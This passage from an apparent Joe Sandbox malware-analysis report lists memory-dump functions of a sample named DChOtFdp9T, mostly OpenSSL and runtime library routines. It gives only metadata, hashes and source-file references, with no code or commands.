                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_mallocR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\record\ssl3_buffer.c$ssl3_setup_write_buffer
                                                                                                                                                                                                                            • API String ID: 1940814937-2966149938
                                                                                                                                                                                                                            • Opcode ID: 4e173172f18392507800b2453eafaa71cc869abed3dd81dcef3802eb3bb81e92
                                                                                                                                                                                                                            • Instruction ID: e1ffb4c557c75ca3963f6683ac9cfce9795f15c16104c06306811023d3eec7ca
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e173172f18392507800b2453eafaa71cc869abed3dd81dcef3802eb3bb81e92
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98315962B09B8182EB109F21E460AAD73A4EB45B94F588632DE7DD7BCADF3CD541C340
                                                                                                                                                                                                                            Function 00007FFDFF241023 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free$R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_set_alpn_protos
                                                                                                                                                                                                                            • API String ID: 3271392029-878666718
                                                                                                                                                                                                                            • Opcode ID: 542e0a9371273f60d1e9cd750be53a00aae48f1584208b45339948bff47f0a29
                                                                                                                                                                                                                            • Instruction ID: ce44084c509d6ee379728bd0a9247afa646185a62fe0e996f65516dd5ac54718
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 542e0a9371273f60d1e9cd750be53a00aae48f1584208b45339948bff47f0a29
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8631C161F2569141F7549B11A4A0FA96750EF80788F485231DE7CD7BC9DE2DD981C700
                                                                                                                                                                                                                            Function 00007FF60299C19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                            • Opcode ID: 9f6baad40be0772a1e05760420ea0be94be042065400a08498f8ed995d511e67
                                                                                                                                                                                                                            • Instruction ID: b3c8c0dcc5573f37e12b5d3b13e0f0639a4fc5203dfbe35ad54bfc16f106b6a8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6baad40be0772a1e05760420ea0be94be042065400a08498f8ed995d511e67
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F318372A08B818AEB608F65E8403ED7760FB88708F14403ADB4E87B95EF78C548C714
                                                                                                                                                                                                                            Function 00007FFDFF2ADF40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_mallocR_newR_set_debugmemcpy
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_lib.c$construct_key_exchange_tbs
                                                                                                                                                                                                                            • API String ID: 3542074325-1491770217
                                                                                                                                                                                                                            • Opcode ID: 382c21de9810c2a45f695ad6f0ed9c596feb77d5d5a5215772df06e66ba482fb
                                                                                                                                                                                                                            • Instruction ID: 4fa9baf8a2d24e10f0016acee9838e1db5bb40dbff86a80f405572265ba9f798
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 382c21de9810c2a45f695ad6f0ed9c596feb77d5d5a5215772df06e66ba482fb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54218412F08B8192E705DB61D9116E96720FB99B80F849231DF6C87B9BEF3CE2918700
                                                                                                                                                                                                                            Function 00007FF6029A9494 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                            • Opcode ID: 5709618119bebde8496f8e644cc76075d364222d75f9466c7edde4c64b387a7a
                                                                                                                                                                                                                            • Instruction ID: 473e776ca4a0da1be46635b09a98adb17e9258ed79e37ce808dc9466ed9fa121
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5709618119bebde8496f8e644cc76075d364222d75f9466c7edde4c64b387a7a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44317332A18B8186EB64CF26E8402AE77A4FF89758F640135EA9D83B55DF7CD155CB00
                                                                                                                                                                                                                            Function 00007FFDFF2ABE20 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3(?,00000000,?,?,?,00007FFDFF2ABAFD), ref: 00007FFDFF2ABFB1
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3(?,00000000,?,?,?,00007FFDFF2ABAFD), ref: 00007FFDFF2ABFC7
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3(?,00000000,?,?,?,00007FFDFF2ABAFD), ref: 00007FFDFF2ABFDC
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2AB660: CRYPTO_zalloc.LIBCRYPTO-3(?,00007FFDFF2AA9B8), ref: 00007FFDFF2AB69F
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2AB660: ERR_new.LIBCRYPTO-3(?,00007FFDFF2AA9B8), ref: 00007FFDFF2AB6AC
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2AB660: ERR_set_debug.LIBCRYPTO-3(?,00007FFDFF2AA9B8), ref: 00007FFDFF2AB6C4
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFF2AB660: ERR_set_error.LIBCRYPTO-3(?,00007FFDFF2AA9B8), ref: 00007FFDFF2AB6D6
                                                                                                                                                                                                                            • CRYPTO_free.LIBCRYPTO-3(?,00000000,?,?,?,00007FFDFF2ABAFD), ref: 00007FFDFF2AC17D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_free$O_zallocR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_dtls.c
                                                                                                                                                                                                                            • API String ID: 346603204-3140652063
                                                                                                                                                                                                                            • Opcode ID: 71f6cbb1c2990b51495ba8d6bc10df97e49dad027e0433a3f2efbc3e7baf2f98
                                                                                                                                                                                                                            • Instruction ID: 3689c86a171ff46091edf3bbeb63d3734bfc17b2b70f03e4bbdf021f3dca5d03
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71f6cbb1c2990b51495ba8d6bc10df97e49dad027e0433a3f2efbc3e7baf2f98
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78A1C263B08A8596DB24CB25D460ABD7760FB45784F444235EBADC7B9ADF3CE150CB00
                                                                                                                                                                                                                            Function 00007FFDFF241E6A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_freeR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$tls_client_key_exchange_post_work
                                                                                                                                                                                                                            • API String ID: 868266018-2346923134
                                                                                                                                                                                                                            • Opcode ID: d910e7746db38f681d0cb92e740f6597433dc3cae2eef2a91c1af439d03e4ad7
                                                                                                                                                                                                                            • Instruction ID: bfe097fd4f8a55d79aa1c2fb30a45d55516f3bcd6c3095949f90b50454f0280d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d910e7746db38f681d0cb92e740f6597433dc3cae2eef2a91c1af439d03e4ad7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8219222B1878291F7449B56E861BFA5350EB44BC4F444232EE7DDB7DEDE2DE9428700
                                                                                                                                                                                                                            Function 00007FFDFF263D28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_set_fd
                                                                                                                                                                                                                            • API String ID: 1552677711-3152457077
                                                                                                                                                                                                                            • Opcode ID: 891ddf403c4c0fd482a3c5881a9003e34426714dabeecafe6ddce73769492d1a
                                                                                                                                                                                                                            • Instruction ID: 182d77ca65f49328fba2d9fb399df6870ec81120d0357dddef3d84ae48b091c1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 891ddf403c4c0fd482a3c5881a9003e34426714dabeecafe6ddce73769492d1a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4201DF63F1D68286FB554760E871AA95720EF89700F880236CB3CC23CBEE2DF8449B05
                                                                                                                                                                                                                            Function 00007FF6029B05F4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                            • Opcode ID: a2c1144ba5a7432e64d3c7aa89e165c12d4bf70c3ee68fe676000b549e9271e0
                                                                                                                                                                                                                            • Instruction ID: 43dec1153114443a90cbb98cffd05cc0ef5a5f2f3dfc8f0d009abe95d52661df
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2c1144ba5a7432e64d3c7aa89e165c12d4bf70c3ee68fe676000b549e9271e0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BB1D622B1869241FE629B27E6001BE6B90FF54BE8F645131EA5D87BC6DFBCE441C740
                                                                                                                                                                                                                            Function 00007FFE0E142EB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878605073.00007FFE0E141000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFE0E140000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878486915.00007FFE0E140000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878635209.00007FFE0E144000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878654068.00007FFE0E145000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878672109.00007FFE0E146000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e140000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassert
                                                                                                                                                                                                                            • String ID: OCB_ENCRYPT==direction || OCB_DECRYPT==direction$src/raw_ocb.c
                                                                                                                                                                                                                            • API String ID: 3234217646-1106498308
                                                                                                                                                                                                                            • Opcode ID: 96f1c7f081ec5b5f110a8a436ffb5769e61779f6ca8b250aca86d5a0fd4485a4
                                                                                                                                                                                                                            • Instruction ID: 477af162151331e581ffcb39ad5d0246f2dd69020f213b2903cf145f03e74adf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96f1c7f081ec5b5f110a8a436ffb5769e61779f6ca8b250aca86d5a0fd4485a4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCE12A8210D6D009C7168F7590206BE7FF0DB1FA59F4D81B7EBE94E54BD508C294EB2A
                                                                                                                                                                                                                            Function 00007FFDFF241CA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_strdup
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_conf.c
                                                                                                                                                                                                                            • API String ID: 2148955802-1527728938
                                                                                                                                                                                                                            • Opcode ID: 4dfb2f5347d2243fba05db8b9de97b1409010663ecc0b3d09fb5f849f8aa4d7b
                                                                                                                                                                                                                            • Instruction ID: e590a042ba6353ad79c5db1c7d5bd0cf574af5f8f5d1327f3715707b25e8674a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dfb2f5347d2243fba05db8b9de97b1409010663ecc0b3d09fb5f849f8aa4d7b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB11C661F0978241FB148706E0A5A696751EF44BC4F485274EF7DCBBCDDE6CE5928B00
                                                                                                                                                                                                                            Function 00007FFDFF241D89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_freeO_memdup
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                            • API String ID: 3962629258-2868363209
                                                                                                                                                                                                                            • Opcode ID: 73b87edce06656b323575e82af4ccd7300509ea5e3152f3d58fef25750e9ee97
                                                                                                                                                                                                                            • Instruction ID: c881c2890e739c8ee9f512746677c63dde19b53b44407e08c4aebf2617fdb0c5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73b87edce06656b323575e82af4ccd7300509ea5e3152f3d58fef25750e9ee97
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89118222B0AF8141E7958B15E5506ACA3A4EB48FC4F880231EE7CDBB9DEF2DD6518300
                                                                                                                                                                                                                            Function 00007FFDFF24103C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
